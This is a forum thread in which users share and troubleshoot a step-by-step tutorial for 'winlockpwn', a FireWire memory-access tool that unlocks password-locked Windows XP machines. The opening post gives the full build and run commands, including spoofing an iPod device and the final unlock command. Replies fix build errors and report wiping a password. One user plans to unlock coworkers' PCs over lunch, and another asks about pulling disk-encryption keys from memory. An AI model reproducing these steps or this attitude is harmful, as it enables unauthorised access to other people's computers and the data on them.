Page 1 of 5 123 ... LastLast
Results 1 to 10 of 46

Thread: Tutorial Winlockpwn

  1. #1
    Junior Member jonah_15's Avatar
    Join Date
    Jan 2010
    Posts
    25

    Default Tutorial Winlockpwn

    Adam Boileau (hxxp://wwx.storm.net.nz/projects/16) recently released source code for a tool winlockpwn that can unlock a password locked Windows machine in seconds.

    Timothy Legge wrote some instructions on how to install this and get winlockpwn working on Ubuntu. I’ve used Timothy’s original document to document how to get the tool working on Backtrack 2 & Backtrack3 Beta.

    Thanks

    Jonah_15

    Replace hxxp with http & wwx with www

    Step 1

    First we need to install the required libraries:

    Libraw 1394 v1.3.0

    hxxp://linux1394.org/dl/libraw1394-1.3.0.tar.gz
    tar xvfz libraw1394-1.3.0.tar.gz
    cd libraw1394-1.3.0
    ./configure
    make
    make dev
    make install

    Step 2

    Install Swig

    hxxp://downloads.sourceforge.net/swig-1.3.34.tar.gz
    tar xvfz swig-1.3.34.tar.gz
    cd swig-1.3.34
    ./configure
    make
    make install

    Step 3

    Install Python 2.3

    hxxp://wwx.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
    tar xvf Python-2.3.6.tar
    mv Python-2.3.6 python-2.3
    cd python-2.3
    ./configure
    make
    make install

    This will install python in /usr/local which means you need to update each script to reference this location.

    Step 4

    search for and comment out the__attribute__ ((deprecated)); and be sure to put an ending semicolon on the previous line

    vi /usr/local/include/libraw1394/raw1394.h

    Step 5

    download the software from hxxp://wwx.storm.net.nz/projects/16

    hxxp://wwx.storm.net.nz/static/files...394-1.0.tar.gz
    tar xvfz pythonraw1394-1.0.tar.gz
    cd pythonraw1394
    wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
    chmod +x ./winlockpwn
    vi Makefile (reference /usr/local instead of /usr for python)
    make

    Step 6

    load the module and set some permissions:

    modprobe raw1394
    chmod 666 /dev/raw1394

    Step 7

    Copy libraw1394.so.8 to to /lib:

    cd /usr/local/lib/
    cp libraw1394.so.8 /lib

    Step 8

    Plug in the firewire cable into both your backtrack system and the target windows system.

    Step 9

    run businfo to check the port configurations:
    vi businfo (update the location of python to be /usr/local/bin/python)
    ./businfo

    Step 10

    vi romtool (update the location of python to be /usr/local/bin/python)
    cp libraw1394.so.8 /lib
    ./romtool -s 0 ipod.csr

    Step 11

    vi winlockpwn (update the location of python to be /usr/local/bin/python)
    ./winlockpwn 0 1 3

  2. #2
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Is it necessary to install python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:

    wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
    chmod +x ./winlockpwn
    vi Makefile (reference /usr/local instead of /usr for python)
    make
    make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.

    William

  3. #3
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by williamc View Post
    Is it necessary to install python 2.3 when you already have 2.5? I ask because I'm getting an error at this step:

    wget hxxp://wwx.storm.net.nz/static/files/winlockpwn
    chmod +x ./winlockpwn
    vi Makefile (reference /usr/local instead of /usr for python)
    make
    make: *** No rule to make target '/usr/local/include/python2.5', needed by '_raw1394.so'. Stop.

    William
    Have you considered changing the reference in the makefile to 2.5 instead of 2.3?
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  4. #4
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    yes, the makefile references python 2.5. Any other ideas? Anyone get this to work following the tutorial?

  5. #5
    Junior Member jonah_15's Avatar
    Join Date
    Jan 2010
    Posts
    25

    Default

    I also had problems with Python 2.5 but had no issues with Python 2.3

  6. #6
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I got it working with Python 2.5. Here are the modified steps:

    Code:
    cd /pythonraw1394
    nano Makefile
    # modify lines as follows:
    _raw1394.so: raw1394_wrap.c /usr/include/python2.5
         $(CC) -Wall -shared -fPIC -I/usr/include/python2.5 -I/usr/local/include/libraw1394 raw1394_wrap.c -lraw1394 -o _raw1394.so
    No other modification to the install were needed. I didnt modify businfo or winlockpwn.

    I successfully wiped the password for a locked Windows XP SP2 machine! Ctrl+Alt+Del and Enter. No password needed.

    Update:
    After running this successfully, I am unable to run it again without restarting Backtrack. I believe the businfo retains the settings for the PC you first plug into. Any way to clear the 1394 settings (maybe take the device down?) and bring it back up in the clear?

    William

  7. #7
    Junior Member jonah_15's Avatar
    Join Date
    Jan 2010
    Posts
    25

    Default

    What I normally do is go into windows device manager on the target and remove the ipod, After I've done this and plugged the firewire cable back in i can successfully run the attack again on the same windows host.

    I've not needed to reboot backtrack.

    Nice job on Python 2.5

  8. #8
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I'm looking to get this working on Vista. From http://storm.net.nz/projects/16
    "people successfully attacking Vista using a slightly modified msv1_0.dll technique"

    I'm researching this, but if anyone can shed some light on it, please do. I've purchased a cardbus firewire card for use on PC's that dont have Firewire ports. You can plug it into a locked PC and the OS will install the drivers. Then just run winlockpwn and your in! Guys in my office have disabled Firewire in the BIOS and set a password. Now I'll spend a lunch unlocking everyone's PC. What a surprise when they get back, hehe.

    An important note, if your running this, use winlockpwn 0 1 2 instead of 0 1 3. The 3 option removes the password on all the accounts which may cause some "issues" if your in a corporate environment. the 2 option only unlocks the PC, should be enough for whatever mischief your planning (and have permission to do so).

    William

  9. #9
    Junior Member imported_spudgunman's Avatar
    Join Date
    Feb 2007
    Posts
    78

    Default

    anyone get this to work? (not the program but the pwnage)

    i get this error

    IOError: [Errno 22] Invalid argument


    from firewire.py, line 693: "If a node doesn't feel like fulfilling a request, it will raise an IOError."


    now if you unplug the fw and plug it back in repeatedly running the script it will start scanning memory only to end with a device busy

    seems that the "money time" is when the device is detected as a "Hard Drive" you start scanning the memory at that point. then the ipod comes in and all work ends

    same issue on two computers

    what are people getting this to work on?


    also - i understand the idea, could this also work for gathering all the memory and getting the key for the encrypted HDD?

  10. #10
    Junior Member jonah_15's Avatar
    Join Date
    Jan 2010
    Posts
    25

    Default

    I've successfully tested it on Sony kit, a number of Dells and a Tosh running Windows XP Sp2. I do have a couple of Dell XPS's which it's failed on as it blue screens the devices.

    Results I’ve had running it on Vista machines (I know this particular version of the tool is not for Vista) is that it also blue screens.

    I know you have tested against 2 computers so far are they the same make?

Page 1 of 5 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •